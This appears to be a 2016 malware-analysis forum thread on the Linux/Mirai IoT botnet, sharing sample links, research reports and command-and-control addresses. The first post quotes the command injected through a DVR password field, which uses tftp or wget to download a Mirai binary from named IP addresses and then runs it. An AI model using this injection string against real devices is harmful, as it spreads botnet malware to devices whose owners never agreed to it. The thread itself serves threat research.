Linux/Mirai

Forum for analysis and discussion about malware.
User avatar
Xylitol
Global Moderator
Posts: 1681
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Linux/Mirai

Post by Xylitol » Sat Sep 17, 2016 1:28 pm

MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ~ http://blog.malwaremustdie.org/2016/08/ ... -just.html

Sample from article:
ARM: https://www.virustotal.com/en/file/65de ... 474118654/
ARM7: https://www.virustotal.com/en/file/c483 ... 474118647/
MIPS: https://www.virustotal.com/en/file/9304 ... 474118648/
Renesas SH: https://www.virustotal.com/en/file/1bf9 ... 474118651/
PowerPC: https://www.virustotal.com/en/file/c61b ... 474118650/
SPARC: https://www.virustotal.com/en/file/d957 ... 474118708/
x86: https://www.virustotal.com/en/file/2238 ... 474118710/

And also this
ARM: https://www.virustotal.com/en/file/2727 ... 474117997/
ARM7: https://www.virustotal.com/en/file/a4b9 ... 474118004/
MIPS: https://www.virustotal.com/en/file/f110 ... 474117999/
Renesas SH: https://www.virustotal.com/en/file/b76a ... 474118000/
PowerPC: https://www.virustotal.com/en/file/849d ... 474118001/
The malware was installed on a dvr and was started with this bash injection in password field

Code: Select all

Password=;tftp -l /dev/dvrHelper -r mirai.arm -g 151.80.99.84 || wget http://5.206.225.122/bins/mirai.arm -O /dev/dvrHelper; chmod 777 /dev/dvrHelper; cd /dev; ./dvrHelper 2>&1;/bin/busybox MIRAI 2>&1;
There are also other platform version, change "arm" with "mips" etc..
Thanks to 0x1BE.
You do not have the required permissions to view the files attached to this post.

tWiCe
Posts: 49
Joined: Sat Jul 18, 2015 8:56 am

Re: Linux/Mirai

Post by tWiCe » Fri Sep 30, 2016 1:22 pm

Investigation of Linux.Mirai's trojan family: https://st.drweb.com/static/new-www/new ... ily_en.pdf

User avatar
Xylitol
Global Moderator
Posts: 1681
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Linux/Mirai

Post by Xylitol » Sat Oct 01, 2016 9:09 pm

You do not have the required permissions to view the files attached to this post.

User avatar
rkhunter
Posts: 1156
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Contact:

Re: Linux/Mirai

Post by rkhunter » Sun Oct 02, 2016 9:44 am

Xylitol wrote:MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled.. ~ http://blog.malwaremustdie.org/2016/08/ ... -just.html
Frankly speaking, I'm really glad to see that he started to do something directly related to his work, besides war with windmills, "approve" ppl in own twitter and spread rumors about own fantasies.

ikolor
Posts: 326
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Linux/Mirai

Post by ikolor » Sun Oct 02, 2016 10:45 am

connect here

184.51.1.18
184.51.1.19

ikolor
Posts: 326
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Linux/Mirai

Post by ikolor » Mon Oct 03, 2016 12:06 pm

There is any information about sample of competition """Bashlight botnet""".

tWiCe
Posts: 49
Joined: Sat Jul 18, 2015 8:56 am

Re: Linux/Mirai

Post by tWiCe » Mon Oct 03, 2016 1:28 pm

ikolor wrote:There is any information about sample of competition """Bashlight botnet""".
Bashlight is just another name for Gafgyt (http://www.kernelmode.info/forum/viewto ... =16&t=3505).

tWiCe
Posts: 49
Joined: Sat Jul 18, 2015 8:56 am

Re: Linux/Mirai

Post by tWiCe » Mon Oct 03, 2016 1:50 pm

ikolor wrote:connect here

184.51.1.18
184.51.1.19
Which one is connecting there? I see it's connecting to b0ts.xf0.pw (185.47.62.199)

ikolor
Posts: 326
Joined: Thu Jun 05, 2014 2:20 pm
Location: Poland

Re: Linux/Mirai

Post by ikolor » Mon Oct 03, 2016 4:57 pm

Sorry I thought I made mistake .For analyze this file from this website show my this number IP

https://malwr.com/analysis/M2Q2ZjY1MmQ2 ... ljMTI1ZTE/

tWiCe
Posts: 49
Joined: Sat Jul 18, 2015 8:56 am

Re: Linux/Mirai

Post by tWiCe » Tue Oct 04, 2016 6:56 am

ikolor wrote:Sorry I thought I made mistake .For analyze this file from this website show my this number IP

https://malwr.com/analysis/M2Q2ZjY1MmQ2 ... ljMTI1ZTE/
You can't analyze ELF files on malwr.com, because it doesn't have any Linux VMs, especially for such architectures as MIPS, MIPSEL, PPC, etc.

Post Reply